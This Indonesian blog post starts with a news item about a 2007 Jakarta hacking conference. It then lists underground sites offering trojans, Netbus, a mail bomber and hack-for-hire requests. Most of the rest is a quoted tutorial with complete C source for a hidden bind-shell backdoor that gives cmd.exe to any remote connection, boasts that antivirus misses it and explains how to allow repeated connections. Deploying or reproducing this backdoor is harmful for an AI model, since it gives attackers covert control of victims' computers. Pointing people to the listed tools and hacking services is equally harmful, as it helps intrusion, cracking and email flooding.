Para hacker yang biasanya hanya beredar di “bawah tanah” bakal
menggelar kembali kopi darat alias berkumpul bersama di Jakarta dan
membagi ilmunya kepada masyarakat. Salah satu teknik menarik yang akan
mereka kupas tuntas tahun ini adalah cara menge-hack ATM bank.
“ATM bank merupakan salah satu fasilitas yang sudah umum dipakai,
jadi masyarakat juga perlu tahu apakah uang yang mereka simpan di bank
telah diamankan dengan sebaik mungkin,” ujar Anthony Zboralski, Chief
Technological Officer (CTO) Bellua Asia Pacific, penyedia konsultan
sistem keamanan informasi, kepada pers di Blackpearl Martini Bar &
Club di Jakarta, Kamis (29/3). Menurut Anthony, dengan mengenalkan
teknik-tenik hacking yang sudah banyak digunakan untuk
menembus sistem keamanan informasi, masyarakat dan perusahaan publik
diharapkan semakin sadar terhadap pentingnya hal tersebut dan
meningkatkan tingkat keamanan sistemnya..
Cara yang ditempuh Bellua Asia Pacific memang terdengar radikal.
Namun, menurut Jim Geovedi, salah satu konsultan Bellua Asia Pacific,
justru inilah cara para hacker berbagi ilmu. Teknik-teknik hacking
untuk menembus sistem keamanan informasi selama ini dikuasai komunitas
bawah tanah termasuk agen intelijen untuk berbagai keperluan termasuk
hobi dan mengasah kemampuan. Namun, ada oknum-oknum tak bertanggung
jawab yang memanfaatkannya untuk tindak kejahatan.
“Jika tidak mengerti bagaimana orang lain menyerang sistem keamanan,
kita akan terus diserang,” imbuh Anthony. Padahal, semakin kompleks
sistem yang dikelola proses bisnis yang berjalan makin meningkat.
Sementara, teknik-teknik serangan juga makin kreatif baik untuk mencuri
informasi, melumpuhkan, atau bahkan merusak sistem.
Nah, informasi-informasi seputar hacking seperti
teknik-teknik baru yang muncul hingga cara penanganannya akan dibahas
tuntas dalam Bellua Cyber Security 2007. Seperti tahun-tahun
sebelumnya, acara tahunan yang sudah digelar Bellua Asia Pacific dan
Pacto Convex Ltd. sejak tahun 2005 ini akan diisi konferensi, workshop,
dan kontes hacking serta menghadirkan hacker-hacker lokal maupun dari berbagai belahan dunia.
Segala aspek yang berkaitan dengan sistem keamanan dari aplikasi,
sistem, jaringan, operating sistem, serta kasus serangan di bank,
telepon, Internet, dan jaringan wireless akan dibahas tuntas
selama 2 hari, 30 dan 31 Oktober 2007 di Hotel Gran Melia, Jakarta.
Tentu saja, teknik untuk mengamankan sistem dan meminimalkan risiko
akibat serangan juga dibahas dalam acara ini.
“Kita sangat moderat, tidak akan memberbaiki atau memperburuk citra hacker. Tapi kenyataannya ada aktivitas hacking yang terjadi di masyarakat. Hal inilah yang harus diketahui publik,” kata Jim. Menurutnya, hacking
sebagai domain ilmu yang harus dikuasai setiap orang. Tahun lalu, Jim
juga membagi pengalaman dan kemampuannya menerobos sistem satelit yang
tentu saja tanpa kita ketahui beredar di atas kita. Dengan menguasai
teknik hacking, setiap orang tahu cara melindungi sistemnya dari kemungkinan serangan orang lain.
>>>www.kompas..com
Dunia underground tidak pernah sepi dari aktivitas dan persaingan. Terlambat berarti "shutdown" (istilah dari KaMII) untuk itu KaMII menyediakan link ke beberapa situs tempat bersemayamnya para hacker yang sudah berpengalaman. Bagi yang berminat silahkan sharing dengan KaMII.
Quote:
[fravia] situs ini memberikan petunjuk dalam aktivitas hack dan terdapat banyak sekali script atau listing program yg sebagian besar digunakan untuk menembus kode regiater atau account seseorang, bahkan pengunjung bisa request untuk hal yg berbau hacking seperti permintaan kelemahan Linux, krack program, menyebar trojan, atau apabila anda sudah akrab dgn salah seorang hacker anda bisa minta bantuan untuk menghack site yg anda inginkan [AntiOnline] Bagi yg ingin mencari berita seputar dunia hacking & cyber crime, site ini merupakan penyebar berita paling cepat dalam hal underground, sedang untuk mendapatkan teknik hacking bisa langsung link ke AntiCode, yg masih satu jajaran dgn AntiOnline, disini bisa didapatkan program hacking dan teror semacam MailBomber, yg dapat berakibat fatal pada alamat E-mail yg terkena karena program ini akan melakukan pengiriman E-Mail setiap 10 menit atau sesuai keinginan [The SaintMan] Site yg satu ini bagus bagi pemula dalam dunia hacking dan ingin mengetahui lebih dalam tentang cara melakukan hacking, site ini menyediakan berbagai contoh cara melakukan kracking dan bisa di download secara gratis, seperti cara menembus nomor register program trial atau cara mengcopy CD-ROM yg telah diproteksi, selain itu site ini juga menyediakan tool-tool yg dibutuhkan dalam melakukan kracking seperti Wdasm, SoftIce, HexEditor, dan masih banyak lagi, tool-tool ini bisa didownload gratis. [RootShell] Bagi yg serius menjadi hacker site ini kaya akan script-script program hacking [HAckerClub] Download Netbus [HAckerNews] Berita tentang Aktivitas Hacking terbaru [Mailabuse] Aksi Spam |
Sedikit
Quote:
Hack 0x04 : Spawn CmdShell (Teknik Bind) Oleh Dendi Suhubdy A.K.A Cron of NuLL Pada kesempatan ini saya akan membahas suatu teknik pembuatan backdoor menggunakan teknik cmd spawn. Nah pasti pembaca bertanya-tanya, apasih istimewanya teknik cmd spawn ini? Udah ada ribuan Remote Administration Tools yang jauh lebih keren, kayak Back Orifice 2000, Subseven, Amitis, Netbus, dll (kalau namanya di daftar halaman ini tak cukup). Cukup dengan BO2K, kita bisa melakukan ribuan hal ke computer orang lain. Mulai dari hijack mouse dan keyboardnya, membuka semua file, mengutak-atik registry, mengendalikan process, live-keylog, bahkan chatting dengan victim juga ada. Nah alasan utama saya memakai spawn cmd shell adalah karena teknik ini begitu simple sehingga semua jenis vendor komputer security tak menaruh signature file khusus untuk mendeteksi jenis backdoor ini. Saya telah melakukan test dengan backdoor ini beberapa jenis proteksi antivirus dan antispyware yang beredar selama ini, contohnya: McAfee Antivirus + Antispyware (Enterprise Security 8.5i), Norton Antivirus, Norman Virus Control, Avira (Antivir Personal Edition Classic), Kaspersky Internet Security, F-Secure Client Security, AVG Antivirus (Free, Personal, dan Enterprise).Oh ya, cmd spawn ini juga digunakan di dalam shellcode exploit Teknik spawn cmdshell itu amat sangat simple. Backdoor ini hanya melakukan proses pembukaan koneksi (bind) pada port tertentu dan ketika ada koneksi yang masuk, maka cmd.exe dari computer remote dimiliki sepenuhnya oleh sang penyerang. Saya menciptakan backdoor ini dengan bahasa C dan saya compile dengan compiler Visual C++ 6.0. Saya lebih menyukai memakai bahasa C daripada bahasa Basic karena ukuran maupun kecepatan executable menjadi lebih baik. Backdoor ini hanya berukuran 5.05 KB, sebelumnya ada optimalisasi berukuran 129 KB. Setelah optimalisasi oleh compiler dengan small executable maka backdoornya menjadi 29 KB. Setelah menambah beberapa baris kode lagi maka exenya jadi 5.05 KB (sebenarnya bila memakai assembly exe ini bisa kurang dari 1 KB). Akhirnya saya menambahkan kompresi UPX sehingga ukuran exe jadi lebih kecil lagi. Ok bro, di bawah ini adalah source code dari program saya ini. Happy coding!!! Inget bro ini untuk 1 kali konek saja, tetapi jika mau digunakan untuk konek berkali-kali, masukkan subrutin accept() di dalam loop tak hingga (while 1) dan untuk proses send menggunakan _beginthread( ) atau AfxBeginThread( ). ================================================== ==================== spawn.h (precompiled header) -> berfungsi untuk memperkecil ukuran executable #ifdef NDEBUG #pragma optimize("gsy",on) #pragma comment(linker,"/RELEASE") #ifdef _MERGE_RDATA_ #pragma comment(linker,"/merge:.rdata=.data") #endif // _MERGE_RDATA_ #pragma comment(linker,"/merge:.text=.data") #pragma comment(linker,"/merge:.reloc=.data") #if _MSC_VER >= 1000 #pragma comment(linker,"/FILEALIGN:0x200") #endif // _MSC_VER >= 1000 #endif // NDEBUG #pragma comment(linker,"/ENTRY:WinMain") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(lib,"msvcrt.lib") #if (_MSC_VER < style=""> #pragma comment(linker,"/IGNORE:4078") #pragma comment(linker,"/OPT:NOWIN98") #endif #define WIN32_LEAN_AND_MEAN ===========================spawn.c================ ===================== #include #pragma comment(linker,"/ENTRY:WinMain") int WINAPI WinMain(HINSTANCE , HINSTANCE , LPSTR ,int ) { STARTUPINFO si; struct sockaddr_in sa; PROCESS_INFORMATION pi; int s WSADATA HWSAdata; WSAStartup(0x101, &HWSAdata); s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0) ; sa.sin_family = AF_INET; sa.sin_port = 0x901F; // (USHORT)htons(8080); sa.sin_addr.s_addr= 0x00; // htonl(INADDR_ANY); bind(s, (struct sockaddr *) &sa, 16); listen(s, 1); s= accept(s,(struct sockaddr *)&sa,NULL); si.cb = sizeof(si); // 0x44; si.wShowWindow = SW_HIDE; // 0x00 si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES; // 0x101 si.hStdInput = si.hStdOutput = si.hStdError = (void *) s; si.lpDesktop = si.lpTitle = (char *) 0x0000; si.lpReserved2 = NULL; CreateProcess( NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,π); } ================================================== =================== |
Cuma Buat Menambah wawasan aja, bukan untuk maksud untuk pamer (ngerti hacker aja kagak, apa yang mau dipamerin yah...wkwkwkwk), kalo ada yang merasa terganggu dengan thread ini saya mohon maaf!!!
Posting Komentar